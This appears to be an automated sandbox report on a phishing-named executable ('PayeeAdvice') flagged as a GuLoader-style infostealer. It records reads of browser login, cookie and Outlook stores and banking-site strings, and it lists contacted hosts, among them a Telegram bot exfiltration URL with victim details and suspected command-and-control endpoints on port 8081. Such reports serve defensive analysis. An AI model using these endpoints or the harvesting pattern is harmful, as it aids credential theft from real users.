            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.0000000038837000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI call chain: ExitProcess graph end nodegraph_0-4799
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeAPI call chain: ExitProcess graph end nodegraph_0-4801
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging3
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input Capture24
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PayeeAdvice_HK54912_R0038704_37504.exe32%ReversingLabsWin32.Trojan.GuLoader
            PayeeAdvice_HK54912_R0038704_37504.exe100%AviraHEUR/AGEN.1331786
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://fa3hwa.dm.files.1drv.com/0%Avira URL Cloudsafe
            http://mail.foodex.com.pk0%Avira URL Cloudsafe
            https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO40%Avira URL Cloudsafe
            https://fa3hwa.dm.files.1drv.com/WE0%Avira URL Cloudsafe
            https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGE0%Avira URL Cloudsafe
            https://fa3hwa.dm.files.1drv.com/ve0%Avira URL Cloudsafe
            https://api.oned0%Avira URL Cloudsafe
            http://foodex.com.pk0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            188.114.97.3
            truefalse
              high
              foodex.com.pk
              37.27.123.72
              truetrue
                unknown
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    high
                    mail.foodex.com.pk
                    unknown
                    unknowntrue
                      unknown
                      api.onedrive.com
                      unknown
                      unknownfalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          fa3hwa.dm.files.1drv.com
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/173.254.250.69false
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                http://checkip.dyndns.org/false
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003767B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20aPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://fa3hwa.dm.files.1drv.com/WEPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://mail.foodex.com.pkPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://api.onedrive.com/PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://fa3hwa.dm.files.1drv.com/y4m_-tS-_uEp2WLW1w2OoZgzsGzku4HExGuSK8wL1Z32RLgaY3iv2hMYfC9YHYGwFGEPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.office.com/lBPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037676000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://fa3hwa.dm.files.1drv.com/PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorPayeeAdvice_HK54912_R0038704_37504.exefalse
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=enPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003764A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://foodex.com.pkPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037628000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://varders.kozow.com:8081PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://chrome.google.com/webstore?hl=enWebPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003763A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://aborters.duckdns.org:8081PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ac.ecosia.org/autocomplete?q=PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.org/xml/173.254.250.69$PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037504000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://51.38.247.67:8081/_send_.php?LPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037605000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://fa3hwa.dm.files.1drv.com/vePayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783144437.0000000006FAF000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2797676860.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://anotherarmy.dns.army:8081PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.onedrive.com/v1.0/shares/sPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://checkip.dyndns.org/0PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3352963551.0000000039D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3350762271.00000000384B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000003.2783046750.0000000006FAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://chrome.google.com/webstore?hl=enlBPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037645000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.orgPayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.00000000374DA000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.000000003756F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3349133220.0000000037549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
